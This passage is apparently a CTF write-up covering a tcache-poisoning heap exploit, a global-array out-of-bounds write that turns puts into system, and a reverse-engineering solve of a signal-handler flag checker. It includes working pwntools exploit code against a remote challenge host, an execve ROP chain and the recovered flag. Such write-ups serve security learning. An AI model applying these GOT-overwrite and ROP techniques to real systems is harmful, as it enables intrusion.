CHUNK >> 12 = 0x5f6 ==> which is our mangle
3
TARGET is .got.plt+offset (like 0x5f3010)

so:

1
target = 0x5f3010
2
mangle = 0x5f6
3
fd = target ^ mangle

how does “controlled allocation to GOT” work

after we corrupt tcache, the flow looks as follows:

1
1. Allocate ==> returns CHUNK ==> 0x5f65d0 (a chunk in .bss)
2
2. we write the mangled fd at CHUNK so that the allocator believes:
3
    head = CHUNK
4
    CHUNK->next decodes to TARGET
5
3. next allocation of same bin:
6
    pops CHUNK
7
    sets head to decoded TARGET
8
4. next allocation:
9
    returns TARGET (inside .got.plt)

this is the controlled allocation to GOT stage.

GOT overwrite ==> ret n pivot

why does GOT work in this static binary

in static builds we still have a .got.plt populated by startup relocations (like IRELATIVE/IFUNC entries for optimized routines like memchr, strcmp, and more).

overwriting one of these slots means that when the program later calls memchr(), the call goes through the entry we overwrote, and we redirect execution to a gadget.

why we use “ret n” (stack adjust pivot)

“ret n” style gadget is a pivot primitive when we can not directly mov rsp, reg, but we can land in a sequence that consumes a controlled return address then skips forward by a constant and returns again.

we use this to land execution onto a ROP chain we placed inside a large controlled buffer, aligned at a known offset. we implement this as follows:

1
p += p64(next(elf.gadget("ret;"))) * (0x200//8)
2
p += <more> pop rdi; pop rsi; pop rdx; pop rax; syscall <more>

this tail is the “ROP runway” the pivot lands on.

idea, summarized

use tcache poisoning to write into .got.plt ==> overwrite an IFUNC slot that will be called during parsing/dumping (memchr / strcmp) ==> point it at a pivot gadget (ret n) ==> pivot causes RSP to land into our controlled buffer region ==> ROP begins

execve ROP / solve

we just do :

1
rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-p'], [b'-c'], [b'cat flag-*'], 0], 0])

summary

<?xml ...?> stores xml_decl_loc = &originals.back()
push >10 <root> ==> originals realloc ==> xml_decl_loc dangling
second <?xml ...?> ==> delete(xml_decl_loc) frees the wrong address
by heap feng shui + rng (1/4096), that wrong free hits tcache_perthread_struct
allocate a 0x280-sized chunk ==> reclaim tcache struct ==> overwrite:
counts[] set non-zero
entries[] set to controlled chunk addresses in .bss
use .bss fake chunks with safe-linking to make next allocation return .got.plt
overwrite a .got.plt IFUNC slot ==> redirect a later call into a pivot gadget (ret n)
pivot lands on our ROP runway inside controlled memory
ROP does execve(“/bin/sh”)

pwn - global writer

tlsbollei@tlsbollei mnt/.../global_writer file chal
chal: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f5fdd19da83b1bc2395b87e2ccd73389b1cad9da, for GNU/Linux 3.2.0, not stripped
tlsbollei@tlsbollei mnt/.../global_writer checksec chal
[*] '/mnt/c/Users/tlsbo/Downloads/global_writer/global_writer/chal'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

immediately notice the bug -

1
void edit(void)
2

3
{
4
  long lVar1;
5
  int iVar2;
6
  long in_FS_OFFSET;
7

8
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
9
  while( true ) {
10
    printf("index? > ");
11
    iVar2 = __isoc99_scanf(&DAT_00402032,&idx);
12
    if (iVar2 != 1) {
13
      handle_error();
14
    }
15
    if (idx == -1) break;
16
    printf("value? > ");
17
    iVar2 = __isoc99_scanf(&DAT_00402032,&values + idx);
18
    if (iVar2 != 1) {
19
      handle_error();
20
    }
21
  }
22
  puts(msg);
23
  printf("Array: ");
24
  for (i = 0; i < 0x10; i = i + 1) {
25
    printf("%d ",(ulong)(uint)(&values)[i]);
26
  }
27
  putchar(10);
28
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
29
                    /* WARNING: Subroutine does not return */
30
    __stack_chk_fail();
31
  }
32
  return;
33
}

bug and solve

there is no bounds check on idx in the values[idx] write; the only check is idx == -1, which exits the loop and becomes our exploit trigger. this gives us an arbitrary write relative to the base of values, and since the index can be negative or large, we can write both before and after the values array.

variables

now we have the addresses of the two variables msg and values. we see the program calling puts(msg);, and as we have a constrained write-what-where primitive we can overwrite puts@GOT to point to the system@plt stub, and we can also overwrite the msg variable, turning puts(msg) into system("sh").

objdump -R chal | grep ' puts@' confirms 0000000000404020 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5, objdump -d chal | grep '<system@plt>' confirms 00000000004010f0 <system@plt>:

because values is declared as int values[SIZE], each index step is 4 bytes, so the write target becomes write_addr = &values[0] + 4⋅idx (in bytes). now we just work out which index reaches which target, bear with my drawings

variable

Important (the final plan)

write the command string “sh\0” to values[0] at 0x4040c0 as the little-endian 32-bit int 0x00006873 = 26739, overwrite the msg pointer to point to 0x4040c0 by writing 4210880 (= 0x4040c0) at index -22 (see above), hijack puts@GOT to point to system@plt by writing 4198640 (= 0x4010f0) at index -40, then exit the loop with index -1 to pop a shell!

1
from pwn import *
2

3
elf = ELF('./chal')
4
context.binary = elf
5

6
#p = process('./chal')
7
p = remote("34.84.25.24", 58554)
8

9
values_addr = 0x4040c0
10
msg_ptr_addr = 0x404068
11
puts_got = 0x404020
12
system_plt = 0x4010f0
13

14
msg_offset = (msg_ptr_addr - values_addr) // 4  # -22
15
puts_offset = (puts_got - values_addr) // 4     # -40
16

17
sh_value = u32(b"sh\x00\x00")  # 26739
18
p.sendlineafter(b'> ', b'0')
19
p.sendlineafter(b'> ', str(sh_value).encode())
20
p.sendlineafter(b'> ', str(msg_offset).encode())
21
p.sendlineafter(b'> ', str(values_addr).encode())
22
p.sendlineafter(b'> ', str(puts_offset).encode())
23
p.sendlineafter(b'> ', str(system_plt).encode())
24
p.sendlineafter(b'> ', b'-1')
25

26
p.interactive()

variable

rev - shadow_spider_network

entry point and red herring

1
void __fastcall __noreturn main(int a1, char **a2, char **a3)
2
{
3
  printf("FLAG> ");
4
  if ( (unsigned int)sub_404450() )
5
    puts("Wrong");
6
  else
7
    puts("Correct!");
8
  exit(0);
9
}

the function sub_40419F() implements RC4 KSA+PRGA using a global key string s

1
__int64 __fastcall sub_40419F(const char *a1)
2
{
3
  char v2; // [rsp+11h] [rbp-12Fh]
4
  char v3; // [rsp+13h] [rbp-12Dh]
5
  int i; // [rsp+14h] [rbp-12Ch]
6
  int j; // [rsp+14h] [rbp-12Ch]
7
  int v6; // [rsp+18h] [rbp-128h]
8
  int v7; // [rsp+1Ch] [rbp-124h]
9
  int v8; // [rsp+20h] [rbp-120h]
10
  int k; // [rsp+24h] [rbp-11Ch]
11
  size_t v10; // [rsp+28h] [rbp-118h]
12
  _BYTE v11[264]; // [rsp+30h] [rbp-110h]
13
  unsigned __int64 v12; // [rsp+138h] [rbp-8h]
14

15
  v12 = __readfsqword(0x28u);
16
  v10 = strlen(s);
17
  sub_404172();
18
  for ( i = 0; i <= 255; ++i )
19
    v11[i] = i;
20
  LOBYTE(v6) = 0;
21
  for ( j = 0; j <= 255; ++j )
22
  {
23
    v6 = (unsigned __int8)(v11[j] + v6 + s[j % v10]);
24
    v3 = v11[j];
25
    v11[j] = v11[v6];
26
    v11[v6] = v3;
27
  }
28
  if ( strlen(a1) != 40 )
29
    return 1;
30
  LOBYTE(v8) = 0;
31
  LOBYTE(v7) = 0;
32
  for ( k = 0; k <= 47; ++k )
33
  {
34
    v7 = (unsigned __int8)(v7 + 1);
35
    v8 = (unsigned __int8)(v11[v7] + v8);
36
    v2 = v11[v7];
37
    v11[v7] = v11[v8];
38
    v11[v8] = v2;
39
    if ( (v11[(unsigned __int8)(v11[v7] + v11[v8])] ^ a1[k]) != byte_4050A0[k] )
40
      return 1;
41
  }
42
  return 0;
43
}

it then compares 48 bytes against byte_4050A0. however, it also enforces strlen(a1)==40, which is incompatible with the real 82 byte flag

1
_BYTE byte_4050A0[48] =
2
{
3
  -63,
4
  120,
5
  -93,
6
  27,
7
  -32,
8
  52,
9
  -120,
10
  10,
11
  14,
12
  119,
13
  -17,
14
  -19,
15
  128,
16
  -63,
17
  -65,
18
  -22,
19
  107,
20
  -71,
21
  -53,
22
  -108,
23
  53,
24
  89,
25
  -20,
26
  -50,
27
  93,
28
  -35,
29
  102,
30
  82,
31
  30,
32
  3,
33
  85,
34
  -91,
35
  128,
36
  -101,
37
  -100,
38
  -69,
39
  -93,
40
  -57,
41
  102,
42
  -81,
43
  72,
44
  -59,
45
  89,
46
  115,
47
  62,
48
  -43,
49
  -49,
50
  -33
51
}; // weak
52
char *s = "the_flying_cabbage_eats_purple_clocks"; // idb

this strongly suggests that RC4 is not the correct verification path

the real bug

the input is read with %s into a 56 byte stack buffer, which is a classic overflow. the function also has a canary, which it reads from fs:0x28.

1
__int64 sub_404450()
2
{
3
  char v1[56]; // [rsp+0h] [rbp-40h] BYREF
4
  unsigned __int64 v2; // [rsp+38h] [rbp-8h]
5

6
  v2 = __readfsqword(0x28u);
7
  __isoc99_scanf("%s", v1);
8
  return sub_40419F(v1);
9
}

this is the BOP entry, you feed an 82 byte string (the real flag) smashing past 56 bytes.

tracerpid check

before our fake RC4 work begins, sub_404172() calls sub_40408F() which reads /proc/self/status and parses TracerPid.

1
_BOOL8 sub_40408F()
2
{
3
  ...
4
  stream = fopen("/proc/self/status", "r");
5
  v2 = 0;
6
  for ( i = fgets(s1, 256, stream); i; i = fgets(s1, 256, stream) )
7
  {
8
    if ( !strncmp(s1, "TracerPid:", 0xAu) )
9
    {
10
      v2 = atoi(v5);
11
      break;
12
    }
13
  }
14
  sub_403ED5();
15
  fclose(stream);
16
  return v2 != 0;
17
}

… called by…

1
_BOOL8 sub_404172()
2
{
3
  _BOOL8 result; // rax
4

5
  result = sub_40408F();
6
  if ( result )
7
  {
8
    sub_403ED5();
9
    exit(1);
10
  }
11
  return result;
12
}

which is a cool anti-debugging check that forces us to solve this offline, statically. the big problem, returning to our stack canary: how can we do anything if main is gated through an overflow and a canary is in place?

alternate stack and handler for SIGILL and SIGSEGV

the program sets up an alternate signal stack and installs the same handler for SIGSEGV (11) and SIGILL (4)

1
unsigned __int64 sub_403F4F()
2
{
3
  size_t v0; // rax
4
  struct sigaltstack s; // [rsp+0h] [rbp-C0h] BYREF
5
  struct sigaction act; // [rsp+20h] [rbp-A0h] BYREF
6
  unsigned __int64 v4; // [rsp+B8h] [rbp-8h]
7

8
  v4 = __readfsqword(0x28u);
9
  memset(&s, 0, sizeof(s));
10
  v0 = sysconf(250);
11
  s.ss_sp = malloc(v0);
12
  s.ss_size = sysconf(250);
13
  s.ss_flags = 0;
14
  if ( sigaltstack(&s, 0) == -1 )
15
    exit(1);
16
  sub_403ED5();
17
  memset(&act, 0, sizeof(act));
18
  act.sa_handler = (__sighandler_t)sub_401363;
19
  sigemptyset(&act.sa_mask);
20
  act.sa_flags = 134217732;
21
  if ( sigaction(11, &act, 0) == -1 )
22
    exit(1);
23
  if ( sigaction(4, &act, 0) == -1 )
24
    exit(1);
25
  return v4 - __readfsqword(0x28u);
26
}

GOT, plt patching, state counter, and why overflow leads into the handler machine

two GOT-like pointers are explicitly present as globals

1
_UNKNOWN *off_407040 = &_stack_chk_fail; // weak
2
_UNKNOWN *off_407088 = &_isoc99_scanf; // weak
3
char byte_4070B8; // weak
4
int dword_4070BC; // weak

the helper sub_403ED5() mutates off_407040 depending on a counter dword_4070BC, then increments it

1
__int64 sub_403ED5()
2
{
3
  if ( dword_4070BC == 1 )
4
  {
5
    off_407040 = &loc_401016;
6
  }
7
  else if ( dword_4070BC == 2 )
8
  {
9
    off_407040 = sub_401080;
10
  }
11
  else if ( dword_4070BC )
12
  {
13
    off_407040 = (_UNKNOWN *)(dword_4070BC + 307656848LL);
14
  }
15
  else
16
  {
17
    off_407040 = sub_401080;
18
  }
19
  return (unsigned int)++dword_4070BC;
20
}

this is what makes stack smashing / faulting keep stepping through custom control flow instead of immediately terminating normally. when the function returns, the failed canary check calls __stack_chk_fail(), but the program has patched off_407040 (the GOT pointer to __stack_chk_fail), so instead of aborting, control ends up in the custom signal handler, sub_401363(), which is a byte-check state machine and looks as follows:

1
_QWORD *__fastcall sub_401363(__int64 a1, __int64 a2, _QWORD *a3)
2
{
3
  __int64 v3; // rax
4
  _QWORD *result; // rax
5
  ...
6
  v3 = a3[21];
7
  if ( v3 == 0x8020392031LL )
8
  {
9
    if ( *(_BYTE *)(a3[15] - 27LL) == 100 )
10
    {
11
      off_407040 = (_UNKNOWN *)218209785;
12
      v45 = a3[20];
13
      if ( (v45 & 0xF) == 8 )
14
        v45 -= 8;
15
      a3[20] = v45;
16
      a3[21] = &loc_404486;
17
      return a3;
18
    }
19
    else
20
    {
21
      a3[21] = sub_401080;
22
      return a3;
23
    }
24
  }
25
and more lines like these
26
}

the signal handler uses the saved context array a3[]. two indices are key :

v3 = a3[21]; is treated as the current state (RIP or dispatch tag)
memory around a3[15] is dereferenced and compared to constants (the flag bytes)

this is the entire core mechanism :

1
byte check: *(_BYTE *)(a3[15] - 27LL) == 100
2
on success: change RIP: a3[21] = &loc_404486;
3
on failure: crash: a3[21] = sub_401080;

the handler contains checks with offsets ranging from -64 up to +17, which is 82 total!

tail logic looks as follows:

1
if ( (_UNKNOWN *)v3 != &locret_40101A )
2
  goto LABEL_482;
3
if ( *(_WORD *)(a3[15] + 17LL) == 125 )
4
{
5
  a3[20] -= 8LL;
6
  off_407040 = (_UNKNOWN *)3735928559LL;
7
  ++dword_4070BC;
8
  a3[21] = 0x1890909090LL;
9
}
10
else
11
{
12
  a3[21] = sub_401080;
13
}
14
return a3;

and the start of the flag, the prefix, is also present as explicit byte checks:

1
case 307656869LL:
2
  if ( *(_BYTE *)(a3[15] - 64LL) == 84 )
3
  {
4
    off_407088 = (_UNKNOWN *)39883721;
5
    a3[21] = &loc_404472;
6
  }
7
  else
8
  {
9
    a3[21] = sub_401080;
10
  }
11
  result = a3;
12
  break;
13
c
14
if ( v3 == 165945142 )
15
{
16
  if ( *(_BYTE *)(a3[15] - 63LL) == 83 )
17
  {
18
    off_407040 = (_UNKNOWN *)41962613;
19
    v9 = a3[20];
20
    if ( (v9 & 0xF) == 8 )
21
      v9 -= 8;
22
    a3[20] = v9;
23
    a3[21] = &loc_4044A1;
24
    return a3;
25
  }
26
  else
27
  {
28
    a3[21] = sub_401080;
29
    return a3;
30
  }
31
}
32
c
33
if ( v3 == 4211843 )
34
{
35
  if ( *(_BYTE *)(a3[15] - 62LL) == 71 )
36
  {
37
    off_407088 = (_UNKNOWN *)33986443;
38
    a3[21] = &loc_404472;
39
  }
40
  else
41
  {
42
    a3[21] = sub_401080;
43
  }
44
  return a3;
45
}
46
c
47
case 307656851LL:
48
  if ( *(_BYTE *)(a3[15] - 61LL) == 67 )
49
  {
50
    off_407040 = (_UNKNOWN *)7467883;
51
    v12 = a3[20];
52
    if ( (v12 & 0xF) == 8 )
53
      v12 -= 8;
54
    a3[20] = v12;
55
    a3[21] = &loc_404486;
56
    result = a3;
57
  }
58
  else
59
  {
60
    a3[21] = sub_401080;
61
    result = a3;
62
  }
63
  break;
64
c
65
case 307656859LL:
66
  if ( *(_BYTE *)(a3[15] - 60LL) == 84 )
67
  {
68
    off_407088 = (_UNKNOWN *)232629856;
69
    a3[21] = &loc_404472;
70
  }
71
  else
72
  {
73
    a3[21] = sub_401080;
74
  }
75
  result = a3;
76
  break;
77
c
78
if ( v3 == 263109988 )
79
{
80
  if ( *(_BYTE *)(a3[15] - 59LL) == 70 )
81
  {
82
    off_407088 = (_UNKNOWN *)206069891;
83
    a3[21] = &loc_404472;
84
  }
85
  else
86
  {
87
    a3[21] = sub_401080;
88
  }
89
  return a3;
90
}
91
c
92
case 307656874LL:
93
  if ( *(_BYTE *)(a3[15] - 58LL) == 123 )
94
  {
95
    off_407088 = (_UNKNOWN *)34022747;
96
    a3[21] = &loc_404472;
97
  }
98
  else
99
  {
100
    a3[21] = sub_401080;
101
  }
102
  result = a3;
103
  break;

from these values you can directly see the values spelling out TSGCTF{ (84,83,71,67,84,70,123)

reconstruction of the flag

the handler reads *(a3[15] ± offset). the checks span -64 to +17. this is consistent with:

a3[15] points at "base" = input + 64

therefore:

1
*(a3[15] - 64) → input[0]
2

3
*(a3[15] - 63) → input[1]
4

5
*(a3[15] + 17) → input[81]

so the index is:

1
if expression is a3[15] - N → idx = 64 - N
2
if expression is a3[15] + N → idx = 64 + N

reconstructing all gives us the flag, TSGCTF{Inv3571ga710n_1n70_BOF_Or13n73d_Pr0gramm1ng_a5_a_73chn1qu3_f0r_0bfu5ca710n}